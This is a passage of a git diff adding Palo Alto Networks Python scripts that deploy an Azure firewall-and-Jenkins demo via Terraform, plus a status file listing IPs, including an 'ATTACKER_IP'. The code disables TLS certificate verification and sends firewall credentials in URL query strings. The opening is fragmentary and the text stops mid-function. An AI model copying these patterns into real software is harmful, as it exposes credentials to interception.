# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
Handles terraform operations and returns variables in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
Generates a Palo Alto Networks API key from username and password credentials
+:param hostname: IP address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
Handles sending requests to API
+:param call: url
+:return: Returns result of call. Will return response for codes between 200 and 400.
+         If a 200 response code is required, check the value in the response
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
+
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deploy.py b/azure/Jenkins_proj-working/deploy.py
new file mode 100644
index 00000000..ee691764
--- /dev/null
+++ b/azure/Jenkins_proj-working/deploy.py
@@ -0,0 +1,730 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p <fwpassword> -r <resource group> -j <region>
+
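+Example (illustrative values only; substitute your own credentials and names):
+
+    python deploy.py -u admin -p 'Firew@ll-Passw0rd' -r jenkins-rg -j centralus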
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+
+from azure.common import AzureException
+from azure.storage.file import FileService
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ """
+ Handles sending requests to API
+ :param call: url
+    :return: Returns result of call. Will return response for codes between 200 and 400.
+             If a 200 response code is required, check the value in the response
+ """
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
+
+class DeployRequestException(Exception):
+ pass
+
+def walkdict(d, match):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param match: key to search for
+    :return: value associated with the key, or None if it is not found
+    """
+    for key, v in d.items():
+        if key == match:
+            return v
+        elif isinstance(v, OrderedDict):
+            found = walkdict(v, match)
+            if found is not None:
+                return found
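+
+# Illustrative example (hypothetical response): given
+#   resp = xmltodict.parse('<response status="success"><result><job>42</job></result></response>')
+# walkdict(resp, 'job') returns '42', assuming xmltodict yields nested OrderedDicts (its historical default).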
+
+
+
+def update_fw(fwMgtIP, api_key):
+ """
+ Applies latest AppID, Threat and AV updates to firewall after launch
+ :param fwMgtIP: Firewall management IP
+ :param api_key: API key
+
+ """
+ # # Download latest applications and threats
+
+    type = "op"
+    # Assumed: the standard PAN-OS XML API op command to download the latest Apps + Threats content.
+    cmd = "<request><content><upgrade><download><latest/></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except DeployRequestException:
+            logger.info("Didn't get http 200 response. Try again")
+        else:
+            try:
+                resp_dict = xmltodict.parse(r.text)
+                if isinstance(resp_dict, OrderedDict):
+                    jobid = walkdict(resp_dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+        except DeployRequestException:
+            logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete ")
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+ # Install latest content update
+    type = "op"
+    # Assumed: the standard PAN-OS XML API op command to install the latest downloaded content.
+    cmd = "<request><content><upgrade><install><version>latest</version></install></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except DeployRequestException:
+            logger.info("Didn't get http 200 response. Try again")
+        else:
+            try:
+                resp_dict = xmltodict.parse(r.text)
+                if isinstance(resp_dict, OrderedDict):
+                    jobid = walkdict(resp_dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+        except DeployRequestException:
+            logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP Install Complete ")
+ completed = 1
+ print("Install latest Applications and Threats update")
+ status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+    # Install latest anti-virus update without committing
+    getjobid = 0
+    jobid = ''
+    type = "op"
+    # Assumed: the standard PAN-OS XML API op command to install the latest anti-virus content without a commit.
+    cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+ key = 'job'
+ while getjobid == 0:
+ try:
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+        except DeployRequestException:
+            logger.info("Didn't get http 200 response. Try again")
+        else:
+            try:
+                resp_dict = xmltodict.parse(r.text)
+                if isinstance(resp_dict, OrderedDict):
+                    jobid = walkdict(resp_dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.info("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+ """
+    Generates a Palo Alto Networks API key from username and password credentials
+    :param hostname: IP address of firewall
+ :param username:
+ :param password:
+ :return: api_key API key for firewall
+ """
+
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+ logger.info("No response from FW. Wait 20 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
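+            # A successful keygen call returns XML of the form (illustrative):
+            #   <response status="success"><result><key>LUFRPT...</key></result></response>
+            # so the key is read from the first child of the first child of the root element.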
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+ fwip = fwIP
+
+ """
+ Gets the firewall status by sending the API request show chassis status.
+ :param fwMgtIP: IP Address of firewall interface to be probed
+ :param api_key: Panos API key
+ """
+
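+    # Assumed: the standard PAN-OS op command <show><chassis-ready></chassis-ready></show>, which
+    # answers <response status="success"><result>yes</result></response> once the dataplane is up.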
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+        logger.info("Http Error: {}: ".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ """
+ For tracking purposes. Write responses to file.
+ :param key:
+ :param value:
+ :return:
+ """
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+    # write status to file for future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+ """
+ Generate a unique share name to avoid overlaps in shared infra
+ :param share_prefix:
+ :param account_name:
+ :param account_key:
+ :return:
+ """
+
+    # FIXME - Need to remove hardcoded directory link below
+
+ d_dir = './WebInDeploy/bootstrap'
+ share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+ print('using share_name of: {}'.format(share_name))
+
+ # archive_file_path = _create_archive_directory(files, share_prefix)
+
+ try:
+ # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+ s = requests.Session()
+ s.verify = False
+
+ file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+ # print(file_service)
+ if not file_service.exists(share_name):
+ file_service.create_share(share_name)
+
+ for d in ['config', 'content', 'software', 'license']:
+ print('creating directory of type: {}'.format(d))
+ if not file_service.exists(share_name, directory_name=d):
+ file_service.create_directory(share_name, d)
+
+ # FIXME - We only handle bootstrap files. May need to handle other dirs
+
+ if d == 'config':
+ for filename in os.listdir(d_dir):
+ print('creating file: {0}'.format(filename))
+ file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+ except AttributeError as ae:
+ # this can be returned on bad auth information
+ print(ae)
+ return "Authentication or other error creating bootstrap file_share in Azure"
+
+ except AzureException as ahe:
+ print(ahe)
+ return str(ahe)
+ except ValueError as ve:
+ print(ve)
+ return str(ve)
+
+ print('all done')
+ return share_name
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 12
+ while True:
+ if count < max_count:
+ time.sleep(10)
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+                logger.debug("Got Invalid response {}".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+ """
+ Handles terraform operations and returns variables in outputs.tf as a dict.
+ :param working_dir: Directory that contains the tf files
+ :param vars: Additional variables passed in to override defaults equivalent to -var
+ :param description: Description of the deployment for logging purposes
+ :return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+ """
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+        # if capture_output is False, then everything will essentially go to stdout and stderr
+ stderr = sys.stderr
+ stdout = sys.stdout
+
+ start_time = time.asctime()
+ print('Starting Deployment at {}\n'.format(start_time))
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir=working_dir)
+
+ tf.cmd('init')
+ if run_plan:
+
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+ skip_plan = True, **kwargs)
+ outputs = tf.output()
+
+ logger.debug('Got Return code {} for deployment of {}'.format(return_code, description))
+
+ return (return_code, outputs)
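+
+# Illustrative usage of apply_tf():
+#   rc, outputs = apply_tf('./WebInDeploy', {'Azure_Region': 'centralus'}, 'WebInDeploy')
+#   alb_dns = outputs['ALB-DNS']['value']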
+
+
+def main(username, password, rg_name, azure_region):
+
+ """
+ Main function
+ :param username:
+ :param password:
+ :param rg_name: Resource group name prefix
+ :param azure_region: Region
+ :return:
+ """
+ username = username
+ password = password
+
+ WebInBootstrap_vars = {
+ 'RG_Name': rg_name,
+ 'Azure_Region': azure_region
+ }
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password,
+ 'Azure_Region': azure_region
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ #
+ return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap')
+
+ if return_code == 0:
+ share_prefix = 'jenkins-demo'
+ resource_group = outputs['Resource_Group']['value']
+ bootstrap_bucket = outputs['Bootstrap_Bucket']['value']
+ storage_account_access_key = outputs['Storage_Account_Access_Key']['value']
+ update_status('web_in_bootstrap_status', 'success')
+ else:
+ logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstrap_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+
+ share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+ WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+ WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+ WebInDeploy_vars.update({'RG_Name': resource_group})
+ WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+ WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+ #
+ # Build Infrastructure
+ #
+ #
+
+
+ return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code == 0:
+ update_status('web_in_deploy_status', 'success')
+ albDns = web_in_deploy_output['ALB-DNS']['value']
+ fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value']
+ nlbDns = web_in_deploy_output['NLB-DNS']['value']
+ fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+
+ logger.info("Got these values from output of WebInDeploy \n\n")
+ logger.info("AppGateway address is {}".format(albDns))
+ logger.info("Internal loadbalancer address is {}".format(nlbDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+ else:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ #
+ # Check firewall is up and running
+ #
+ #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+ logger.info("Updating firewall with latest content pack")
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+ logger.info("Applying addtional config to firewall")
+
+ return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+
+ if return_code == 0:
+ update_status('web_in_fw_conf', 'success')
+ logger.info("WebInFWConf ok")
+
+ else:
+ logger.info("WebInFWConf sent return code {}".format(return_code))
+        update_status('web_in_fw_conf', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+ parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ resource_group = args.resource_group
+ azure_region = args.azure_region
+
+ main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/deployment_status.json b/azure/Jenkins_proj-working/deployment_status.json
new file mode 100644
index 00000000..96c9a020
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployment_status.json
@@ -0,0 +1 @@
+{"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", "value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deployold.py b/azure/Jenkins_proj-working/deployold.py
new file mode 100644
index 00000000..b2ddb37e
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployold.py
@@ -0,0 +1,628 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p <fwpassword> -r <resource group> -j <region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+
+import requests
+import urllib3
+from azure.common import AzureException
+from azure.storage.file import FileService
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+# from . import cache_utils
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
+
+class DeployRequestException(Exception):
+ pass
+
+
+def listRecursive (d, key):
+ for k, v in d.items ():
+ if isinstance (v, OrderedDict):
+ for found in listRecursive (v, key):
+ yield found
+ if k == key:
+ yield v
+
+def update_fw(fwMgtIP, api_key):
+ # # Download latest applications and threats
+
+    type = "op"
+    # Assumed: the standard PAN-OS XML API op command to download the latest Apps + Threats content.
+    cmd = "<request><content><upgrade><download><latest/></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid =0
+ jobid = ''
+ key ='job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except DeployRequestException:
+            logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ for found in listRecursive(dict, 'job'):
+ jobid = found
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(30)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+        except DeployRequestException:
+            logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete " )
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ else:
+ logger.info('Unable to determine job status')
+
+
+ # install latest anti-virus update without committing
+ getjobid =0
+ jobid = ''
+ key ='job'
+ while getjobid == 0:
+ try:
+
+            type = "op"
+            # Assumed: the standard PAN-OS op command to install the latest anti-virus content without a commit.
+            cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+        except DeployRequestException:
+            logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ for found in listRecursive(dict, 'job'):
+ jobid = found
+ except Exception as err:
